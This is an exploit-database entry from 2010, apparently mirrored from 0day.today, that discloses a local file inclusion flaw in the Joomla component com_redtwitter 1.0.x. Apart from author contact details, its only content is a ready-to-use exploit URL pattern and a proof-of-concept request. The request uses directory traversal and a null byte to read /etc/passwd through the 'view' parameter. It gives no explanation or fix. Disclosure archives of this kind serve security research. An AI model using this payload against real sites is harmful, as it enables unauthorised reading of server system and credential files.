id: 11615
date: 04/04/2010
title: Joomla Component redTWITTER Local File Inclusion Vulnerability
author: NoGe
cves: 

==============================================================
Joomla Component redTWITTER Local File Inclusion Vulnerability
==============================================================

=========================================================================================================================
 
 
  [o] Joomla Component redTWITTER Local File Inclusion Vulnerability
  
       Software : com_redtwitter version 1.0.x
       Vendor   : http://redcomponent.com/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com/
       Home     : http://antisecurity.org/
 
 
=========================================================================================================================
 
 
  [o] Exploit
 
       http://localhost/[path]/index.php?option=com_redtwitter&view=[LFI]
 
 
  [o] PoC
 
       http://localhost/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00
 
 
=========================================================================================================================



#  0day.today [2023-03-26]  #